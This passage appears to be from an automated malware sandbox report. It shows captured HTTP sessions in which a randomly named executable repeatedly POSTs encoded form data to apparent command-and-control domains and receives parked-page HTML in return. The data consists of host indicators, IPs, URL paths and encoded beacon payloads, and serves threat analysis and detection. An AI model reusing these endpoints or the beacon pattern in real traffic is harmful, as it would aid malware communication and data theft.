                                                                                Data Ascii: ynlT=FGGxLekk0opaizeqP8nnERSrf/y035rqPR3RMbXJ1xTRufBVcfNMr53ozyGov056KnfJ68+BF6wuexJHJsYVYYJRyraOV+mLbgl7JLbn/r9GVmwrUWJHb8y7655KnuqdRPn1ZsYbSap9jyB97qwNQB3HkrNc3XWSYtDfmWbkBfMT9dSEoKRL0zhyXMO+r1jVt+XUbc5cSMcvHZpsv5QD3HqukiDN


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                35 | 192.168.2.8 | 49748 | 208.91.197.27 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:30:09.204523087 CET | 1771 | OUT | POST /1y0g/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.regislemberthe.online
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.regislemberthe.online
                                                                                Referer: http://www.regislemberthe.online/1y0g/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 46 47 47 78 4c 65 6b 6b 30 6f 70 61 69 7a 65 71 50 38 6e 6e 45 52 53 72 66 2f 79 30 33 35 72 71 50 52 33 52 4d 62 58 4a 31 78 4c 52 76 75 68 56 64 34 68 4d 6c 5a 33 6f 77 79 47 70 76 30 35 6a 4b 6b 76 7a 36 39 43 52 46 38 30 75 66 55 64 48 4c 64 59 56 57 59 4a 52 74 37 61 54 62 65 6e 54 62 67 31 33 4a 4c 4c 6e 2f 72 39 47 56 6b 34 72 51 44 6c 48 58 63 79 6b 74 4a 35 4f 78 65 71 78 52 50 66 4c 5a 73 4e 75 53 4c 56 39 6b 53 78 39 67 38 45 4e 53 68 33 42 6e 72 4e 36 33 58 62 4b 59 74 66 31 6d 58 75 2f 42 59 67 54 2f 59 69 59 31 72 4a 69 71 79 38 42 5a 75 4f 2b 6f 48 48 68 7a 2f 62 58 58 4f 56 62 64 71 45 36 48 72 56 6d 37 6f 56 37 71 44 57 30 7a 58 61 34 55 2b 6e 74 58 76 54 4b 5a 65 35 71 75 37 4d 5a 32 70 72 77 56 50 30 56 45 68 59 46 36 38 63 4b 38 54 6c 67 67 34 57 31 5a 55 45 70 73 58 6e 59 7a 37 67 35 63 58 7a 49 54 74 35 39 33 6d 62 47 48 58 59 58 43 6e 6a 48 47 4e 35 64 62 38 34 39 52 30 6e 47 77 39 4d 50 32 44 4b 4d 4b 50 62 30 49 45 4f 59 38 41 38 41 45 48 34 4c 4a 4e 63 4a 36 [TRUNCATED]
                                                                                Data Ascii: ynlT=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 [TRUNCATED]


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                36 | 192.168.2.8 | 49749 | 208.91.197.27 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:30:11.870946884 CET | 461 | OUT | GET /1y0g/?BZcp=FxLxsNCx3xt&ynlT=IEuRIrUs/61ernzQacDnFDSOdtOPzcO3DCiGM7fBggrgjt9jf+N1tpys90b5qRt+HznRgPSmLqw7b0RWB/MNecVj6cupfpeXLidzN4OT675FT0gUTBFuY+WN75tNw87LNQ== HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.regislemberthe.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:30:13.423017979 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Date: Tue, 26 Nov 2024 08:30:12 GMT
                                                                                Server: Apache
                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                Set-Cookie: vsid=908vr480155413032682401; expires=Sun, 25-Nov-2029 08:30:13 GMT; Max-Age=157680000; path=/; domain=www.regislemberthe.online; HttpOnly
                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_iNBkSjT5nnnENXYYQwJSucQzt7UkU5o4d/xlQaaB9LEASPkn7SpNfeQ4EejaS+6dH+uQZVfbAFPpk7y+T6mJ4g==
                                                                                Content-Length: 2645
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 69 4e 42 6b 53 6a 54 35 6e 6e 6e 45 4e 58 59 59 51 77 4a 53 75 63 51 7a 74 37 55 6b 55 35 6f 34 64 2f 78 6c 51 61 61 42 39 4c 45 41 53 50 6b 6e 37 53 70 4e 66 65 51 34 45 65 6a 61 53 2b 36 64 48 2b 75 51 5a 56 66
                                                                                Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_iNBkSjT5nnnENXYYQwJSucQzt7UkU5o4d/xlQaaB9LEASPkn7SpNfeQ4EejaS+6dH+uQZVf
                                                                                Nov 26, 2024 09:30:13.423084021 CET | 1236 | IN | Data Raw: 62 41 46 50 70 6b 37 79 2b 54 36 6d 4a 34 67 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69
                                                                                Data Ascii: bAFPpk7y+T6mJ4g=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.regislemberthe.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.regislemberthe.online/px.js?c
                                                                                Nov 26, 2024 09:30:13.423120022 CET | 1169 | IN | Data Raw: 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c
                                                                                Data Ascii: </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                37 | 192.168.2.8 | 49750 | 199.59.243.227 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:30:19.841239929 CET | 698 | OUT | POST /c8xp/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.honk.city
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.honk.city
                                                                                Referer: http://www.honk.city/c8xp/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 6f 30 4a 2b 4d 70 4b 47 71 48 75 41 73 42 46 2f 67 6a 4f 7a 67 45 5a 68 35 45 4d 35 59 4a 36 38 67 33 45 72 4f 79 46 78 5a 54 52 46 64 6b 36 55 33 64 66 34 61 56 74 50 6c 77 6c 6d 4d 37 54 62 58 4b 38 36 75 6e 7a 33 76 61 54 37 71 45 53 6e 51 6e 5a 54 46 41 5a 76 71 79 71 6c 57 54 61 36 70 30 44 67 66 4a 79 61 66 6a 5a 2f 4d 62 47 71 44 74 42 52 5a 37 65 50 4f 41 70 6d 52 44 6b 31 73 57 39 2b 66 7a 74 57 31 73 78 4c 4c 63 6b 67 35 2f 33 35 4c 6f 56 2f 71 5a 37 6a 66 39 56 4c 78 58 51 57 4e 4a 62 2f 43 34 52 44 76 62 48 4a 35 66 50 79 53 2b 38 2b 49 53 45 75 64 41 49 77 61 4a 36 4b 61 78 38 3d
                                                                                Data Ascii: ynlT=o0J+MpKGqHuAsBF/gjOzgEZh5EM5YJ68g3ErOyFxZTRFdk6U3df4aVtPlwlmM7TbXK86unz3vaT7qESnQnZTFAZvqyqlWTa6p0DgfJyafjZ/MbGqDtBRZ7ePOApmRDk1sW9+fztW1sxLLckg5/35LoV/qZ7jf9VLxXQWNJb/C4RDvbHJ5fPyS+8+ISEudAIwaJ6Kax8=
                                                                                Nov 26, 2024 09:30:20.966624022 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                date: Tue, 26 Nov 2024 08:30:20 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1102
                                                                                x-request-id: 7c51611e-19e8-4924-abb1-61cd3c757d17
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uZpS28e6c0X703MIk+TgIIeR569ayNWWI3JQItor4rKofmgqrtlk5/tueO6O77moxxjvQwSfoiaO5CsSjKNJyw==
                                                                                set-cookie: parking_session=7c51611e-19e8-4924-abb1-61cd3c757d17; expires=Tue, 26 Nov 2024 08:45:20 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 5a 70 53 32 38 65 36 63 30 58 37 30 33 4d 49 6b 2b 54 67 49 49 65 52 35 36 39 61 79 4e 57 57 49 33 4a 51 49 74 6f 72 34 72 4b 6f 66 6d 67 71 72 74 6c 6b 35 2f 74 75 65 4f 36 4f 37 37 6d 6f 78 78 6a 76 51 77 53 66 6f 69 61 4f 35 43 73 53 6a 4b 4e 4a 79 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uZpS28e6c0X703MIk+TgIIeR569ayNWWI3JQItor4rKofmgqrtlk5/tueO6O77moxxjvQwSfoiaO5CsSjKNJyw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Nov 26, 2024 09:30:20.966640949 CET | 555 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2M1MTYxMWUtMTllOC00OTI0LWFiYjEtNjFjZDNjNzU3ZDE3IiwicGFnZV90aW1lIjoxNzMyNjA5OD


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                38 | 192.168.2.8 | 49751 | 199.59.243.227 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:30:22.507232904 CET | 718 | OUT | POST /c8xp/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.honk.city
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.honk.city
                                                                                Referer: http://www.honk.city/c8xp/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 6f 30 4a 2b 4d 70 4b 47 71 48 75 41 76 67 31 2f 6d 41 32 7a 77 55 5a 75 33 6b 4d 35 42 5a 36 34 67 33 59 72 4f 33 39 68 59 68 31 46 64 42 65 55 32 63 66 34 62 56 74 50 74 51 6c 5a 52 72 54 41 58 4b 77 4d 75 6e 50 33 76 61 48 37 71 46 69 6e 51 30 42 53 45 51 5a 74 30 53 71 64 53 54 61 36 70 30 44 67 66 4a 6d 67 66 6a 42 2f 4d 71 32 71 43 4d 42 51 47 4c 65 41 4a 41 70 6d 47 54 6b 50 73 57 39 59 66 33 74 77 31 71 31 4c 4c 65 73 67 35 71 44 34 42 6f 56 78 30 70 36 4d 51 50 59 2f 32 67 59 51 52 4a 32 62 4b 59 68 72 75 74 32 6a 6a 39 48 30 52 2b 55 56 49 52 73 59 59 33 56 59 41 71 71 36 45 6d 71 5a 49 48 65 72 67 57 31 65 64 2f 46 4f 6c 6a 70 54 49 37 2f 57
                                                                                Data Ascii: ynlT=o0J+MpKGqHuAvg1/mA2zwUZu3kM5BZ64g3YrO39hYh1FdBeU2cf4bVtPtQlZRrTAXKwMunP3vaH7qFinQ0BSEQZt0SqdSTa6p0DgfJmgfjB/Mq2qCMBQGLeAJApmGTkPsW9Yf3tw1q1LLesg5qD4BoVx0p6MQPY/2gYQRJ2bKYhrut2jj9H0R+UVIRsYY3VYAqq6EmqZIHergW1ed/FOljpTI7/W
                                                                                Nov 26, 2024 09:30:23.585691929 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                date: Tue, 26 Nov 2024 08:30:22 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1102
                                                                                x-request-id: e9eb5493-4ce8-4be4-a275-4b80b78c244c
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uZpS28e6c0X703MIk+TgIIeR569ayNWWI3JQItor4rKofmgqrtlk5/tueO6O77moxxjvQwSfoiaO5CsSjKNJyw==
                                                                                set-cookie: parking_session=e9eb5493-4ce8-4be4-a275-4b80b78c244c; expires=Tue, 26 Nov 2024 08:45:23 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 5a 70 53 32 38 65 36 63 30 58 37 30 33 4d 49 6b 2b 54 67 49 49 65 52 35 36 39 61 79 4e 57 57 49 33 4a 51 49 74 6f 72 34 72 4b 6f 66 6d 67 71 72 74 6c 6b 35 2f 74 75 65 4f 36 4f 37 37 6d 6f 78 78 6a 76 51 77 53 66 6f 69 61 4f 35 43 73 53 6a 4b 4e 4a 79 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uZpS28e6c0X703MIk+TgIIeR569ayNWWI3JQItor4rKofmgqrtlk5/tueO6O77moxxjvQwSfoiaO5CsSjKNJyw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Nov 26, 2024 09:30:23.585711002 CET | 555 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTllYjU0OTMtNGNlOC00YmU0LWEyNzUtNGI4MGI3OGMyNDRjIiwicGFnZV90aW1lIjoxNzMyNjA5OD


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                39 | 192.168.2.8 | 49752 | 199.59.243.227 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:30:25.182893991 CET | 1735 | OUT | POST /c8xp/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.honk.city
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.honk.city
                                                                                Referer: http://www.honk.city/c8xp/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 6f 30 4a 2b 4d 70 4b 47 71 48 75 41 76 67 31 2f 6d 41 32 7a 77 55 5a 75 33 6b 4d 35 42 5a 36 34 67 33 59 72 4f 33 39 68 59 68 39 46 64 58 53 55 33 2f 33 34 4a 46 74 50 6a 77 6c 69 52 72 53 61 58 4b 70 46 75 6e 43 4b 76 59 2f 37 72 6a 57 6e 48 78 31 53 4b 51 5a 74 38 79 71 6d 57 54 61 72 70 30 54 6b 66 4a 32 67 66 6a 42 2f 4d 70 2b 71 4c 39 42 51 56 62 65 50 4f 41 70 69 52 44 6c 67 73 57 31 6d 66 33 70 47 31 61 56 4c 46 65 63 67 37 59 62 34 44 49 56 7a 31 70 36 55 51 50 55 67 32 67 73 36 52 4a 7a 2b 4b 62 78 72 75 4a 66 61 6d 4f 66 70 4d 76 38 58 4c 6a 41 69 55 30 68 35 4b 72 61 63 5a 45 36 74 66 33 43 54 6f 30 4e 67 49 64 45 73 30 6c 39 65 4a 62 43 42 69 57 52 33 44 2b 42 6a 70 4b 30 33 2b 6e 34 64 34 54 4e 57 70 4b 76 74 57 65 72 51 41 6d 45 59 6f 7a 65 72 45 4d 44 74 49 4b 48 6d 74 62 2b 42 4f 42 47 54 56 72 4b 4d 6c 31 34 41 5a 6d 6a 61 34 63 56 42 35 73 4a 67 64 75 6f 57 6b 72 4a 54 58 30 43 59 6b 35 43 4f 66 70 55 64 51 68 72 39 55 59 57 36 2f 46 51 76 55 45 43 45 4e 58 39 2b 7a [TRUNCATED]
                                                                                Data Ascii: ynlT=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 [TRUNCATED]
                                                                                Nov 26, 2024 09:30:26.306643009 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                date: Tue, 26 Nov 2024 08:30:25 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1102
                                                                                x-request-id: 2e53d0cf-d8c7-47af-8c4e-7ddf13c54fb0
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uZpS28e6c0X703MIk+TgIIeR569ayNWWI3JQItor4rKofmgqrtlk5/tueO6O77moxxjvQwSfoiaO5CsSjKNJyw==
                                                                                set-cookie: parking_session=2e53d0cf-d8c7-47af-8c4e-7ddf13c54fb0; expires=Tue, 26 Nov 2024 08:45:26 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 5a 70 53 32 38 65 36 63 30 58 37 30 33 4d 49 6b 2b 54 67 49 49 65 52 35 36 39 61 79 4e 57 57 49 33 4a 51 49 74 6f 72 34 72 4b 6f 66 6d 67 71 72 74 6c 6b 35 2f 74 75 65 4f 36 4f 37 37 6d 6f 78 78 6a 76 51 77 53 66 6f 69 61 4f 35 43 73 53 6a 4b 4e 4a 79 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uZpS28e6c0X703MIk+TgIIeR569ayNWWI3JQItor4rKofmgqrtlk5/tueO6O77moxxjvQwSfoiaO5CsSjKNJyw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Nov 26, 2024 09:30:26.306710005 CET | 555 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmU1M2QwY2YtZDhjNy00N2FmLThjNGUtN2RkZjEzYzU0ZmIwIiwicGFnZV90aW1lIjoxNzMyNjA5OD


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                40 | 192.168.2.8 | 49753 | 199.59.243.227 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
